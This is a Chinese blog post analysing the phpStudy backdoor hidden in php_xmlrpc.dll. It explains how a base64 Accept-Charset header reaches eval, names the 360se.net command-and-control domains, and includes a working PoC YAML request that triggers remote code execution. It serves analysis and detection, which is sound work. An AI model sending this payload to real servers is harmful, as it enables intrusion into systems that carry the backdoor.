感謝pcat師傅的文章:
20號得知phphstudy有後門,不知道官網的是不是也被入侵了,當時沒有進行檢視,,,由於當時正在秋招面試比較忙,鴿了幾天有了下文:
被中馬的為php_xmlrpc.dll這個dll檔案,這個可以通過查詢洩露字串很容易通過指令碼實現,就不貼了,可以以eval為關鍵字來進行搜尋
phpstudy2018
版php-5.2.17
和php-5.4.45
存在後門
上圖為ida搜尋字串得到的資料,由此可以基本驗證這個dll檔案為可以檔案,接下來要驗證他的控制流
這裡拼接了乙個@eval(gzuncompress('%s'));的**,明顯是呼叫gzuncompress方法解密執行某些**,沒解密前的**來自asc_1000d028到unk_1000d66c這個部分,拼接好的上方放在v44處,(gzuncompress很多時候可以用作木馬免殺,龜龜)
正向連線:判斷accept_encoding如果等於gzip,deflate,讀取accept_charse的內容做base64解密,交給zend_eval_strings()函式可以執行任意惡意**。
zend_eval_string處執行v42處執行的**,我們把資料提取出來,並進行處理,並且經過php的gzuncompress解碼,得到以下
基本上就是fsockopen的通訊,回連攻擊者的$ip = '360se.net', $port = '20123',中間一堆其他的條件
今天剛好到期
漏洞驗證外掛程式
name: poc-yaml-phpstudy-backdoor-rce
rules:
- method: get
path: /index.php
headers:
accept-encoding: 'gzip,deflate'
accept-charset: chjpbnrmkg1knsg0ntczmtm0nckpow==
follow_redirects: false
expression: |
body.bcontains(b'a5952fb670b54572bcec7440a554633e')
detail:
author: 17bdw
affected version: "phpstudy 2016-phpstudy 2018 php 5.2 php 5.4"
vuln_url: "php_xmlrpc.dll"
links:
-
domain
360se.net
bbs.360se.net
www.360se.net
up.360se.net
down.360se.net
cms.360se.net
file.360se.net
ftp.360se.net
md5
0f7ad38e7a9857523dfbce4bce43a9e9
使用Ghidra分析phpStudy後門
主要工具 kali linux ghidra 9.0.4 010editor 9.0.2 樣本環境 windows7 phpstudy 20180211 先在 windows 7 虛擬機器中安裝 phpstudy 20180211,然後把安裝完後的目錄拷貝到 kali linux 中。根據網上公開的...
phpstudy後門復現
1.影響版本分布 2.直觀感性驗證 用記事本或者notepad 開啟phpstudy安裝目錄下的 phptutorial php php 5.4.45 ext php xmlrpc.dll 存在 eval s s 即說明有後門。3.客觀理性驗證 bp抓包復現 直接訪問首頁抓包 在請求頭里構造 acc...
phpstudy後門檔案檢測及利用
bin bash author pcat chamd5.org trojan feature trojan eval function check dir x dll x then strings f2 grep q trojan if 0 then echo f2 strings f2 grep ...